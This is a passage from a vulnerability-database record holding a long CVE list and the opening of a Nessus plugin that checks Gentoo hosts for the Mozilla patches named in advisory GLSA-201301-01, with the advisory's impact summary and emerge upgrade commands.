"CVE-2009-0772", "CVE-2012-3995", "CVE-2012-4201", "CVE-2010-0159", "CVE-2009-0773", "CVE-2011-3659", "CVE-2011-3663", "CVE-2010-3131", "CVE-2012-0470", "CVE-2012-0446", "CVE-2008-4063", "CVE-2012-3976", "CVE-2012-1972", "CVE-2010-1200", "CVE-2010-0175", "CVE-2010-0170", "CVE-2012-3988", "CVE-2012-0457", "CVE-2010-3778", "CVE-2012-3994", "CVE-2012-3962", "CVE-2010-2770", "CVE-2010-3774", "CVE-2012-0459", "CVE-2011-2362", "CVE-2009-1304", "CVE-2010-1213", "CVE-2010-3177", "CVE-2012-5843", "CVE-2009-1835", "CVE-2011-0085", "CVE-2009-0352", "CVE-2009-3984", "CVE-2009-3380", "CVE-2008-5510", "CVE-2011-0080", "CVE-2012-1950", "CVE-2008-5502", "CVE-2009-3981", "CVE-2010-3765", "CVE-2010-0167", "CVE-2009-3373", "CVE-2009-3980", "CVE-2008-4070", "CVE-2012-4183", "CVE-2010-3178", "CVE-2012-1994", "CVE-2011-3661", "CVE-2009-3383", "CVE-2012-4181", "CVE-2011-3652", "CVE-2009-1311", "CVE-2011-1712", "CVE-2008-4067", "CVE-2010-1210", "CVE-2011-2364", "CVE-2009-2469", "CVE-2011-0073", "CVE-2010-1197", "CVE-2010-1207", "CVE-2009-0652", "CVE-2012-4186", "CVE-2012-1948", "CVE-2008-5012", "CVE-2011-2982", "CVE-2012-1938", "CVE-2012-0449", "CVE-2010-3769", "CVE-2012-3969", "CVE-2009-1838", "CVE-2012-1953", "CVE-2008-5013", "CVE-2012-1949", "CVE-2012-0456", "CVE-2011-2372", "CVE-2010-3773", "CVE-2009-1309", "CVE-2011-0079", "CVE-2010-3169", "CVE-2009-2662", "CVE-2012-3970", "CVE-2011-2997", "CVE-2011-0053", "CVE-2009-1832", "CVE-2012-5840", "CVE-2010-3176", "CVE-2012-4191", "CVE-2010-3174", "CVE-2012-1966", "CVE-2010-3768", "CVE-2009-3372", "CVE-2010-2763", "CVE-2011-0066", "CVE-2010-1212", "CVE-2009-1837", "CVE-2010-1206", "CVE-2010-1211", "CVE-2009-2464", "CVE-2011-2990", "CVE-2010-1121", "CVE-2009-0356", "CVE-2011-3389", "CVE-2010-0164", "CVE-2008-3836", "CVE-2010-3167", "CVE-2012-4930", "CVE-2012-4202", "CVE-2007-2671", "CVE-2011-2984", "CVE-2010-3180", "CVE-2012-3957", "CVE-2011-3660", "CVE-2009-3986", "CVE-2012-1941", "CVE-2009-2408", "CVE-2010-3399", "CVE-2009-2665", "CVE-2008-4066", "CVE-2008-5018", "CVE-2009-3978", "CVE-2012-3984", "CVE-2009-0354", "CVE-2009-3079", "CVE-2011-0056", "CVE-2012-0444", "CVE-2011-3650", "CVE-2010-2753", "CVE-2012-1946", "CVE-2010-3776", "CVE-2010-1215", "CVE-2012-4182", "CVE-2011-2980", "CVE-2012-4187", "CVE-2008-4069", "CVE-2010-0166", "CVE-2011-3647", "CVE-2011-0065", "CVE-2011-0062", "CVE-2008-0016", "CVE-2009-0358", "CVE-2011-3101", "CVE-2010-3168", "CVE-2010-0173", "CVE-2009-1044", "CVE-2008-5513", "CVE-2008-4059", "CVE-2010-2764", "CVE-2011-0081", "CVE-2009-0771", "CVE-2009-1392", "CVE-2008-5504", "CVE-2008-5019", "CVE-2012-1954", "CVE-2009-0774", "CVE-2009-3375", "CVE-2012-0461", "CVE-2011-2376", "CVE-2009-2472", "CVE-2012-3958", "CVE-2009-0071", "CVE-2008-5023", "CVE-2012-0469", "CVE-2010-3171", "CVE-2009-3072", "CVE-2012-3973", "CVE-2008-5822", "CVE-2012-1975", "CVE-2011-0075", "CVE-2012-0464", "CVE-2012-1967", "CVE-2011-3653", "CVE-2010-0648", "CVE-2010-0178", "CVE-2010-3166", "CVE-2010-0177", "CVE-2011-0074", "CVE-2012-3956", "CVE-2010-2769", "CVE-2011-3649", "CVE-2012-3982", "CVE-2009-3555", "CVE-2011-2989", "CVE-2010-1196", "CVE-2008-3837", "CVE-2009-0357", "CVE-2008-5021", "CVE-2008-5017", "CVE-2012-3966", "CVE-2012-5839", "CVE-2011-2378", "CVE-2009-1308", "CVE-2010-3775", "CVE-2009-2467", "CVE-2012-1961", "CVE-2010-5074", "CVE-2011-2996", "CVE-2010-3173", "CVE-2012-4216", "CVE-2008-4062", "CVE-2010-3179", "CVE-2010-0182", "CVE-2012-3967", "CVE-2011-3651", "CVE-2008-4060", "CVE-2009-0689", "CVE-2010-0181", "CVE-2012-1951", "CVE-2012-0475", "CVE-2012-3965", "CVE-2012-1952", "CVE-2010-1201", "CVE-2011-4688", "CVE-2009-1306", "CVE-2010-1585", "CVE-2009-2479", "CVE-2012-3959", "CVE-2012-0455", "CVE-2009-0777", "CVE-2010-2755", "CVE-2011-0084", "CVE-2011-0051", "CVE-2010-3767", "CVE-2012-1939", "CVE-2009-1834", "CVE-2010-3771", "CVE-2010-0183", "CVE-2012-0474", "CVE-2012-3975", "CVE-2010-2768", "CVE-2008-5014", "CVE-2008-0367", "CVE-2008-4058", "CVE-2011-3002", "CVE-2012-4184", "CVE-2011-0057", "CVE-2012-0447", "CVE-2011-3232", "CVE-2008-5913", "CVE-2007-3073", "CVE-2012-4205", "CVE-2010-2751", "CVE-2009-1836", "CVE-2011-0069", "CVE-2008-5022", "CVE-2008-5512", "CVE-2012-3992", "CVE-2009-3374", "CVE-2008-5501", "CVE-2008-4068", "CVE-2008-5016", "CVE-2011-3004", "CVE-2012-3980", "CVE-2008-5503", "CVE-2011-2374", "CVE-2012-1955", "CVE-2009-1839", "CVE-2012-1960", "CVE-2012-0445", "CVE-2009-3074", "CVE-2012-1965", "CVE-2011-3670", "CVE-2012-0462", "CVE-2010-1028", "CVE-2010-0162", "CVE-2011-2377", "CVE-2009-2463", "CVE-2009-2061", "CVE-2009-3070", "CVE-2011-3000", "CVE-2010-2765", "CVE-2009-3069", "CVE-2010-0171", "CVE-2010-2767", "CVE-2009-0353", "CVE-2011-0078", "CVE-2012-3960", "CVE-2010-3175", "CVE-2009-0775", "CVE-2012-0451", "CVE-2011-3655", "CVE-2012-4180", "CVE-2009-2044", "CVE-2010-3182", "CVE-2009-0776", "CVE-2009-3371", "CVE-2009-3377", "CVE-2012-1959", "CVE-2007-1861", "CVE-2011-2363", "CVE-2009-3075", "CVE-2010-0163", "CVE-2010-1208", "CVE-2011-0070", "CVE-2012-1947", "CVE-2009-1841", "CVE-2010-3170", "CVE-2011-3005", "CVE-2011-0059", "CVE-2012-1971", "CVE-2009-3983", "CVE-2012-4208", "CVE-2009-3987", "CVE-2011-3658", "CVE-2011-2373", "CVE-2008-5511", "CVE-2012-1957", "CVE-2012-1958", "CVE-2011-0054", "CVE-2012-4190", "CVE-2008-4064", "CVE-2012-1976", "CVE-2011-1187", "CVE-2012-5835", "CVE-2010-3183", "CVE-2009-2654", "CVE-2010-1202", "CVE-2012-0468", "CVE-2009-3982", "CVE-2009-3985", "CVE-2009-2065", "CVE-2009-1313", "CVE-2009-3382", "CVE-2008-5508", "CVE-2012-3972", "CVE-2012-4207", "CVE-2011-2988", "CVE-2010-3770", "CVE-2008-4061", "CVE-2010-1199", "CVE-2012-4204", "CVE-2008-0017", "CVE-2009-3988", "CVE-2010-3400", "CVE-2009-1302", "CVE-2011-2985", "CVE-2009-2466", "CVE-2012-4192", "CVE-2011-0058", "CVE-2011-2987", "CVE-2012-4188", "CVE-2012-0441", "CVE-2008-5024", "CVE-2011-0076", "CVE-2007-2437", "CVE-2012-5833", "CVE-2011-2999", "CVE-2012-3964", "CVE-2012-5841", "CVE-2010-0179", "CVE-2010-1209", "CVE-2010-2754", "CVE-2008-5507", "CVE-2009-2471", "CVE-2012-3990", "CVE-2011-2375", "CVE-2010-1198", "CVE-2008-4065", "CVE-2009-1840", "CVE-2011-3665", "CVE-2009-3381", "CVE-2011-0067", "CVE-2010-2760", "CVE-2012-1937", "CVE-2012-4215", "CVE-2009-2043", "CVE-2009-1307", "CVE-2009-2664", "CVE-2012-0463", "CVE-2010-4508", "CVE-2009-1310", "CVE-2009-3077", "CVE-2011-3003", "CVE-2011-2991", "CVE-2008-5015", "CVE-2011-0082", "CVE-2011-2983", "CVE-2012-4179", "CVE-2008-4582", "CVE-2011-3001", "CVE-2012-1964", "CVE-2009-2462", "CVE-2009-3378", "CVE-2011-3062", "CVE-2009-1303", "CVE-2012-0477", "CVE-2012-0473", "CVE-2012-4194", "CVE-2011-2365", "CVE-2012-4209", "CVE-2012-1963", "CVE-2012-4196", "CVE-2008-5506", "CVE-2009-2404", "CVE-2009-2465", "CVE-2012-0467", "CVE-2011-2981", "CVE-2012-0458", "CVE-2010-0169", "CVE-2010-2752", "CVE-2009-3078", "CVE-2012-0471", "CVE-2012-3961", "CVE-2010-3766", "CVE-2012-3971", "CVE-2008-5052", "CVE-2011-0055", "CVE-2009-1828", "CVE-2011-0072"], "modified": "2013-01-08T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:seamonkey-bin", "p-cpe:/a:gentoo:linux:firefox", "p-cpe:/a:gentoo:linux:mozilla-firefox-bin", "p-cpe:/a:gentoo:linux:thunderbird", "cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:mozilla-thunderbird-bin", "p-cpe:/a:gentoo:linux:seamonkey", "p-cpe:/a:gentoo:linux:icecat", "p-cpe:/a:gentoo:linux:mozilla-firefox", "p-cpe:/a:gentoo:linux:nss", "p-cpe:/a:gentoo:linux:xulrunner", "p-cpe:/a:gentoo:linux:thunderbird-bin", "p-cpe:/a:gentoo:linux:xulrunner-bin", "p-cpe:/a:gentoo:linux:firefox-bin", "p-cpe:/a:gentoo:linux:mozilla-thunderbird"], "id": "GENTOO_GLSA-201301-01.NASL", "href": "https://www.tenable.com/plugins/nessus/63402", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201301-01.\n#\n# The advisory text is Copyright (C) 2001-2020 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63402);\n script_version(\"1.31\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2007-1861\", \"CVE-2007-2437\", \"CVE-2007-2671\", \"CVE-2007-3073\", \"CVE-2008-0016\", \"CVE-2008-0017\", \"CVE-2008-0367\", \"CVE-2008-3835\", \"CVE-2008-3836\", \"CVE-2008-3837\", \"CVE-2008-4058\", \"CVE-2008-4059\", \"CVE-2008-4060\", \"CVE-2008-4061\", \"CVE-2008-4062\", \"CVE-2008-4063\", \"CVE-2008-4064\", \"CVE-2008-4065\", \"CVE-2008-4066\", \"CVE-2008-4067\", \"CVE-2008-4068\", \"CVE-2008-4069\", \"CVE-2008-4070\", \"CVE-2008-4582\", \"CVE-2008-5012\", \"CVE-2008-5013\", \"CVE-2008-5014\", \"CVE-2008-5015\", \"CVE-2008-5016\", \"CVE-2008-5017\", \"CVE-2008-5018\", \"CVE-2008-5019\", \"CVE-2008-5021\", \"CVE-2008-5022\", \"CVE-2008-5023\", \"CVE-2008-5024\", \"CVE-2008-5052\", \"CVE-2008-5500\", \"CVE-2008-5501\", \"CVE-2008-5502\", \"CVE-2008-5503\", \"CVE-2008-5504\", \"CVE-2008-5505\", \"CVE-2008-5506\", \"CVE-2008-5507\", \"CVE-2008-5508\", \"CVE-2008-5510\", \"CVE-2008-5511\", \"CVE-2008-5512\", \"CVE-2008-5513\", \"CVE-2008-5822\", \"CVE-2008-5913\", \"CVE-2008-6961\", \"CVE-2009-0071\", \"CVE-2009-0352\", \"CVE-2009-0353\", \"CVE-2009-0354\", \"CVE-2009-0355\", \"CVE-2009-0356\", \"CVE-2009-0357\", \"CVE-2009-0358\", \"CVE-2009-0652\", \"CVE-2009-0689\", \"CVE-2009-0771\", \"CVE-2009-0772\", \"CVE-2009-0773\", \"CVE-2009-0774\", \"CVE-2009-0775\", \"CVE-2009-0776\", \"CVE-2009-0777\", \"CVE-2009-1044\", \"CVE-2009-1169\", \"CVE-2009-1302\", \"CVE-2009-1303\", \"CVE-2009-1304\", \"CVE-2009-1305\", \"CVE-2009-1306\", \"CVE-2009-1307\", \"CVE-2009-1308\", \"CVE-2009-1309\", \"CVE-2009-1310\", \"CVE-2009-1311\", \"CVE-2009-1312\", \"CVE-2009-1313\", \"CVE-2009-1392\", \"CVE-2009-1571\", \"CVE-2009-1828\", \"CVE-2009-1832\", \"CVE-2009-1833\", \"CVE-2009-1834\", \"CVE-2009-1835\", \"CVE-2009-1836\", \"CVE-2009-1837\", \"CVE-2009-1838\", \"CVE-2009-1839\", \"CVE-2009-1840\", \"CVE-2009-1841\", \"CVE-2009-2043\", \"CVE-2009-2044\", \"CVE-2009-2061\", \"CVE-2009-2065\", \"CVE-2009-2210\", \"CVE-2009-2404\", \"CVE-2009-2408\", \"CVE-2009-2462\", \"CVE-2009-2463\", \"CVE-2009-2464\", \"CVE-2009-2465\", \"CVE-2009-2466\", \"CVE-2009-2467\", \"CVE-2009-2469\", \"CVE-2009-2470\", \"CVE-2009-2471\", \"CVE-2009-2472\", \"CVE-2009-2477\", \"CVE-2009-2478\", \"CVE-2009-2479\", \"CVE-2009-2535\", \"CVE-2009-2654\", \"CVE-2009-2662\", \"CVE-2009-2664\", \"CVE-2009-2665\", \"CVE-2009-3069\", \"CVE-2009-3070\", \"CVE-2009-3071\", \"CVE-2009-3072\", \"CVE-2009-3074\", \"CVE-2009-3075\", \"CVE-2009-3076\", \"CVE-2009-3077\", \"CVE-2009-3078\", \"CVE-2009-3079\", \"CVE-2009-3274\", \"CVE-2009-3371\", \"CVE-2009-3372\", \"CVE-2009-3373\", \"CVE-2009-3374\", \"CVE-2009-3375\", \"CVE-2009-3376\", \"CVE-2009-3377\", \"CVE-2009-3378\", \"CVE-2009-3379\", \"CVE-2009-3380\", \"CVE-2009-3381\", \"CVE-2009-3382\", \"CVE-2009-3383\", \"CVE-2009-3388\", \"CVE-2009-3389\", \"CVE-2009-3555\", \"CVE-2009-3978\", \"CVE-2009-3979\", \"CVE-2009-3980\", \"CVE-2009-3981\", \"CVE-2009-3982\", \"CVE-2009-3983\", \"CVE-2009-3984\", \"CVE-2009-3985\", \"CVE-2009-3986\", \"CVE-2009-3987\", \"CVE-2009-3988\", \"CVE-2010-0159\", \"CVE-2010-0160\", \"CVE-2010-0162\", \"CVE-2010-0163\", \"CVE-2010-0164\", \"CVE-2010-0165\", \"CVE-2010-0166\", \"CVE-2010-0167\", \"CVE-2010-0168\", \"CVE-2010-0169\", \"CVE-2010-0170\", \"CVE-2010-0171\", \"CVE-2010-0172\", \"CVE-2010-0173\", \"CVE-2010-0174\", \"CVE-2010-0175\", \"CVE-2010-0176\", \"CVE-2010-0177\", \"CVE-2010-0178\", \"CVE-2010-0179\", \"CVE-2010-0181\", \"CVE-2010-0182\", \"CVE-2010-0183\", \"CVE-2010-0220\", \"CVE-2010-0648\", \"CVE-2010-0654\", \"CVE-2010-1028\", \"CVE-2010-1121\", \"CVE-2010-1125\", \"CVE-2010-1196\", \"CVE-2010-1197\", \"CVE-2010-1198\", \"CVE-2010-1199\", \"CVE-2010-1200\", \"CVE-2010-1201\", \"CVE-2010-1202\", \"CVE-2010-1203\", \"CVE-2010-1205\", \"CVE-2010-1206\", \"CVE-2010-1207\", \"CVE-2010-1208\", \"CVE-2010-1209\", \"CVE-2010-1210\", \"CVE-2010-1211\", \"CVE-2010-1212\", \"CVE-2010-1213\", \"CVE-2010-1214\", \"CVE-2010-1215\", \"CVE-2010-1585\", \"CVE-2010-2751\", \"CVE-2010-2752\", \"CVE-2010-2753\", \"CVE-2010-2754\", \"CVE-2010-2755\", \"CVE-2010-2760\", \"CVE-2010-2762\", \"CVE-2010-2763\", \"CVE-2010-2764\", \"CVE-2010-2765\", \"CVE-2010-2766\", \"CVE-2010-2767\", \"CVE-2010-2768\", \"CVE-2010-2769\", \"CVE-2010-2770\", \"CVE-2010-3131\", \"CVE-2010-3166\", \"CVE-2010-3167\", \"CVE-2010-3168\", \"CVE-2010-3169\", \"CVE-2010-3170\", \"CVE-2010-3171\", \"CVE-2010-3173\", \"CVE-2010-3174\", \"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3182\", \"CVE-2010-3183\", \"CVE-2010-3399\", \"CVE-2010-3400\", \"CVE-2010-3765\", \"CVE-2010-3766\", \"CVE-2010-3767\", \"CVE-2010-3768\", \"CVE-2010-3769\", \"CVE-2010-3770\", \"CVE-2010-3771\", \"CVE-2010-3772\", \"CVE-2010-3773\", \"CVE-2010-3774\", \"CVE-2010-3775\", \"CVE-2010-3776\", \"CVE-2010-3777\", \"CVE-2010-3778\", \"CVE-2010-4508\", \"CVE-2010-5074\", \"CVE-2011-0051\", \"CVE-2011-0053\", \"CVE-2011-0054\", \"CVE-2011-0055\", \"CVE-2011-0056\", \"CVE-2011-0057\", \"CVE-2011-0058\", \"CVE-2011-0059\", \"CVE-2011-0061\", \"CVE-2011-0062\", \"CVE-2011-0065\", \"CVE-2011-0066\", \"CVE-2011-0067\", \"CVE-2011-0068\", \"CVE-2011-0069\", \"CVE-2011-0070\", \"CVE-2011-0071\", \"CVE-2011-0072\", \"CVE-2011-0073\", \"CVE-2011-0074\", \"CVE-2011-0075\", \"CVE-2011-0076\", \"CVE-2011-0077\", \"CVE-2011-0078\", \"CVE-2011-0079\", \"CVE-2011-0080\", \"CVE-2011-0081\", \"CVE-2011-0082\", \"CVE-2011-0083\", \"CVE-2011-0084\", \"CVE-2011-0085\", \"CVE-2011-1187\", \"CVE-2011-1202\", \"CVE-2011-1712\", \"CVE-2011-2362\", \"CVE-2011-2363\", \"CVE-2011-2364\", \"CVE-2011-2365\", \"CVE-2011-2369\", \"CVE-2011-2370\", \"CVE-2011-2371\", \"CVE-2011-2372\", \"CVE-2011-2373\", \"CVE-2011-2374\", \"CVE-2011-2375\", \"CVE-2011-2376\", \"CVE-2011-2377\", \"CVE-2011-2378\", \"CVE-2011-2605\", \"CVE-2011-2980\", \"CVE-2011-2981\", \"CVE-2011-2982\", \"CVE-2011-2983\", \"CVE-2011-2984\", \"CVE-2011-2985\", \"CVE-2011-2986\", \"CVE-2011-2987\", \"CVE-2011-2988\", \"CVE-2011-2989\", \"CVE-2011-2990\", \"CVE-2011-2991\", \"CVE-2011-2993\", \"CVE-2011-2995\", \"CVE-2011-2996\", \"CVE-2011-2997\", \"CVE-2011-2998\", \"CVE-2011-2999\", \"CVE-2011-3000\", \"CVE-2011-3001\", \"CVE-2011-3002\", \"CVE-2011-3003\", \"CVE-2011-3004\", \"CVE-2011-3005\", \"CVE-2011-3026\", \"CVE-2011-3062\", \"CVE-2011-3101\", \"CVE-2011-3232\", \"CVE-2011-3389\", \"CVE-2011-3640\", \"CVE-2011-3647\", \"CVE-2011-3648\", \"CVE-2011-3649\", \"CVE-2011-3650\", \"CVE-2011-3651\", \"CVE-2011-3652\", \"CVE-2011-3653\", \"CVE-2011-3654\", \"CVE-2011-3655\", \"CVE-2011-3658\", \"CVE-2011-3659\", \"CVE-2011-3660\", \"CVE-2011-3661\", \"CVE-2011-3663\", \"CVE-2011-3665\", \"CVE-2011-3670\", \"CVE-2011-3866\", \"CVE-2011-4688\", \"CVE-2012-0441\", \"CVE-2012-0442\", \"CVE-2012-0443\", \"CVE-2012-0444\", \"CVE-2012-0445\", \"CVE-2012-0446\", \"CVE-2012-0447\", \"CVE-2012-0449\", \"CVE-2012-0450\", \"CVE-2012-0451\", \"CVE-2012-0452\", \"CVE-2012-0455\", \"CVE-2012-0456\", \"CVE-2012-0457\", \"CVE-2012-0458\", \"CVE-2012-0459\", \"CVE-2012-0460\", \"CVE-2012-0461\", \"CVE-2012-0462\", \"CVE-2012-0463\", \"CVE-2012-0464\", \"CVE-2012-0467\", \"CVE-2012-0468\", \"CVE-2012-0469\", \"CVE-2012-0470\", \"CVE-2012-0471\", \"CVE-2012-0473\", \"CVE-2012-0474\", \"CVE-2012-0475\", \"CVE-2012-0477\", \"CVE-2012-0478\", \"CVE-2012-0479\", \"CVE-2012-1937\", \"CVE-2012-1938\", \"CVE-2012-1939\", \"CVE-2012-1940\", \"CVE-2012-1941\", \"CVE-2012-1945\", \"CVE-2012-1946\", \"CVE-2012-1947\", \"CVE-2012-1948\", \"CVE-2012-1949\", \"CVE-2012-1950\", \"CVE-2012-1951\", \"CVE-2012-1952\", \"CVE-2012-1953\", \"CVE-2012-1954\", \"CVE-2012-1955\", \"CVE-2012-1956\", \"CVE-2012-1957\", \"CVE-2012-1958\", \"CVE-2012-1959\", \"CVE-2012-1960\", \"CVE-2012-1961\", \"CVE-2012-1962\", \"CVE-2012-1963\", \"CVE-2012-1964\", \"CVE-2012-1965\", \"CVE-2012-1966\", \"CVE-2012-1967\", \"CVE-2012-1970\", \"CVE-2012-1971\", \"CVE-2012-1972\", \"CVE-2012-1973\", \"CVE-2012-1974\", \"CVE-2012-1975\", \"CVE-2012-1976\", \"CVE-2012-1994\", \"CVE-2012-3956\", \"CVE-2012-3957\", \"CVE-2012-3958\", \"CVE-2012-3959\", \"CVE-2012-3960\", \"CVE-2012-3961\", \"CVE-2012-3962\", \"CVE-2012-3963\", \"CVE-2012-3964\", \"CVE-2012-3965\", \"CVE-2012-3966\", \"CVE-2012-3967\", \"CVE-2012-3968\", \"CVE-2012-3969\", \"CVE-2012-3970\", \"CVE-2012-3971\", \"CVE-2012-3972\", \"CVE-2012-3973\", \"CVE-2012-3975\", \"CVE-2012-3976\", \"CVE-2012-3978\", \"CVE-2012-3980\", \"CVE-2012-3982\", \"CVE-2012-3984\", \"CVE-2012-3985\", \"CVE-2012-3986\", \"CVE-2012-3988\", \"CVE-2012-3989\", \"CVE-2012-3990\", \"CVE-2012-3991\", \"CVE-2012-3992\", \"CVE-2012-3993\", \"CVE-2012-3994\", \"CVE-2012-3995\", \"CVE-2012-4179\", \"CVE-2012-4180\", \"CVE-2012-4181\", \"CVE-2012-4182\", \"CVE-2012-4183\", \"CVE-2012-4184\", \"CVE-2012-4185\", \"CVE-2012-4186\", \"CVE-2012-4187\", \"CVE-2012-4188\", \"CVE-2012-4190\", \"CVE-2012-4191\", \"CVE-2012-4192\", \"CVE-2012-4193\", \"CVE-2012-4194\", \"CVE-2012-4195\", \"CVE-2012-4196\", \"CVE-2012-4201\", \"CVE-2012-4202\", \"CVE-2012-4204\", \"CVE-2012-4205\", \"CVE-2012-4206\", \"CVE-2012-4207\", \"CVE-2012-4208\", \"CVE-2012-4209\", \"CVE-2012-4210\", \"CVE-2012-4212\", \"CVE-2012-4215\", \"CVE-2012-4216\", \"CVE-2012-4930\", \"CVE-2012-5354\", \"CVE-2012-5829\", \"CVE-2012-5830\", \"CVE-2012-5833\", \"CVE-2012-5835\", \"CVE-2012-5836\", \"CVE-2012-5838\", \"CVE-2012-5839\", \"CVE-2012-5840\", \"CVE-2012-5841\", \"CVE-2012-5842\", \"CVE-2012-5843\");\n script_bugtraq_id(51752, 51753, 51754, 51756, 51757, 51765, 51787, 51975, 52456, 52457, 52458, 52459, 52460, 52461, 52463, 52464, 52465, 52466, 52467, 53219, 53220, 53221, 53223, 53224, 53225, 53227, 53228, 53229, 53230, 53231, 53315, 53791, 53792, 53793, 53794, 53796, 53797, 53798, 53799, 53800, 54572, 54573, 54574, 54575, 54576, 54577, 54578, 54579, 54580, 54581, 54582, 54583, 54584, 54585, 54586, 55257, 55260, 55264, 55266, 55274, 55276, 55277, 55278, 55292, 55304, 55306, 55308, 55310, 55311, 55313, 55314, 55316, 55317, 55318, 55319, 55320, 55321, 55322, 55323, 55324, 55325, 55340, 55342, 55857, 55922, 55924, 55926, 55927, 55930, 55931, 55932, 56118, 56119, 56120, 56121, 56123, 56125, 56126, 56127, 56128, 56129, 56130, 56131, 56135, 56136, 56140, 56151, 56153, 56154, 56155, 56301, 56302, 56306, 56611, 56612, 56613, 56614, 56616, 56618, 56621, 56625, 56627, 56629, 56630, 56631, 56632, 56633, 56634, 56635, 56636, 56637, 56641, 56642, 56643, 56644, 56646);\n script_xref(name:\"GLSA\", value:\"201301-01\");\n\n script_name(english:\"GLSA-201301-01 : Mozilla Products: Multiple vulnerabilities (BEAST)\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-201301-01\n(Mozilla Products: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Mozilla Firefox,\n Thunderbird, SeaMonkey, NSS, GNU IceCat, and XULRunner. Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could entice a user to view a specially crafted web\n page or email, possibly resulting in execution of arbitrary code or a\n Denial of Service condition. Furthermore, a remote attacker may be able\n to perform Man-in-the-Middle attacks, obtain sensitive information,\n bypass restrictions and protection mechanisms, force file downloads,\n conduct XML injection attacks, conduct XSS attacks, bypass the Same\n Origin Policy, spoof URL’s for phishing attacks, trigger a vertical\n scroll, spoof the location bar, spoof an SSL indicator, modify the\n browser’s font, conduct clickjacking attacks, or have other unspecified\n impact.\n A local attacker could gain escalated privileges, obtain sensitive\n information, or replace an arbitrary downloaded file.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n # https://blog.mozilla.org/security/2011/03/22/firefox-blocking-fraudulent-certificates/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a9b416a4\"\n );\n # https://www.mozilla.org/security/announce/2011/mfsa2011-11.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2011-11/\"\n );\n # https://www.mozilla.org/security/announce/2011/mfsa2011-34.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2011-34/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201301-01\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All Mozilla Firefox users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/firefox-10.0.11'\n All users of the Mozilla Firefox binary package should upgrade to the\n latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/firefox-bin-10.0.11'\n All Mozilla Thunderbird users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=mail-client/thunderbird-10.0.11'\n All users of the Mozilla Thunderbird binary package should upgrade to\n the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=mail-client/thunderbird-bin-10.0.11'\n All Mozilla SeaMonkey users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/seamonkey-2.14-r1'\n All users of the Mozilla SeaMonkey binary package should upgrade to the\n latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/seamonkey-bin-2.14'\n All NSS users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-libs/nss-3.14'\n The “www-client/mozilla-firefox” package has been merged into the\n “www-client/firefox” package. To upgrade, please unmerge\n “www-client/mozilla-firefox” and then emerge the latest\n “www-client/firefox” package:\n # emerge --sync\n # emerge --unmerge 'www-client/mozilla-firefox'\n # emerge --ask --oneshot --verbose '>=www-client/firefox-10.0.11'\n The “www-client/mozilla-firefox-bin” package has been merged into\n the “www-client/firefox-bin” package. To upgrade, please unmerge\n “www-client/mozilla-firefox-bin” and then emerge the latest\n “www-client/firefox-bin” package:\n # emerge --sync\n # emerge --unmerge 'www-client/mozilla-firefox-bin'\n # emerge --ask --oneshot --verbose '>=www-client/firefox-bin-10.0.11'\n The “mail-client/mozilla-thunderbird” package has been merged into\n the “mail-client/thunderbird” package. To upgrade, please unmerge\n “mail-client/mozilla-thunderbird” and then emerge the latest\n “mail-client/thunderbird” package:\n # emerge --sync\n # emerge --unmerge 'mail-client/mozilla-thunderbird'\n # emerge --ask --oneshot --verbose '>=mail-client/thunderbird-10.0.11'\n The “mail-client/mozilla-thunderbird-bin” package has been merged\n into the “mail-client/thunderbird-bin” package. To upgrade, please\n unmerge “mail-client/mozilla-thunderbird-bin” and then emerge the\n latest “mail-client/thunderbird-bin” package:\n # emerge --sync\n # emerge --unmerge 'mail-client/mozilla-thunderbird-bin'\n # emerge --ask --oneshot --verbose\n '>=mail-client/thunderbird-bin-10.0.11'\n Gentoo discontinued support for GNU IceCat. We recommend that users\n unmerge GNU IceCat:\n # emerge --unmerge 'www-client/icecat'\n Gentoo discontinued support for XULRunner. We recommend that users\n unmerge XULRunner:\n # emerge --unmerge 'net-libs/xulrunner'\n Gentoo discontinued support for the XULRunner binary package. We\n recommend that users unmerge XULRunner:\n # emerge --unmerge 'net-libs/xulrunner-bin'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 